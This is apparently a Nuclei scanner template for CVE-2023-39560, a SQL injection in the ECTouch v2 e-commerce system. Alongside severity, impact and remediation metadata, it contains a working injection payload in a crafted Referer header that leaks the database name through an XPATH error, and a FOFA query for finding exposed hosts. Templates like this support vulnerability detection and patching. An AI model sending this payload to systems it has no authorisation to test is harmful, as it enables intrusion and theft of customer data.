id: CVE-2023-39560

info:
  name: ECTouch v2 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.
  impact: |
    Unauthenticated attackers can exploit SQL injection through the $arr['id'] parameter to extract database contents, potentially stealing customer data, order information, and payment details from the ECTouch e-commerce system.
  remediation: |
    Update ECTouch to a version newer than 2.0 that uses parameterized queries or prepared statements for the id parameter in default/helpers/insert.php.
  reference:
    - https://wiki.bachang.org/doc/2582/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39560
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-39560
    cwe-id: CWE-89
    epss-score: 0.04109
    epss-percentile: 0.89479
    cpe: cpe:2.3:a:ectouch:ectouch:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ectouch
    product: ectouch
    fofa-query: icon_hash="127711143"
  tags: cve,cve2023,ectouch,sqli,vuln

http:
  - raw:
      - |
        GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
        Host: {{Hostname}}
        Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "XPATH syntax error: '~[^~]+~'"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - "XPATH syntax error: '~([a-z0-9]+)~'"
# digest: 4a0a0047304502203e1a471614144acdd7399d5fbf18132ac1664959cc36cf8e21e43402f9cb216b022100eb6688767cb2f72e2820ec4ea16f359a4281e5fccb851938d96e4a4379c942ff:922c64590222798bb761d5b6d8e72950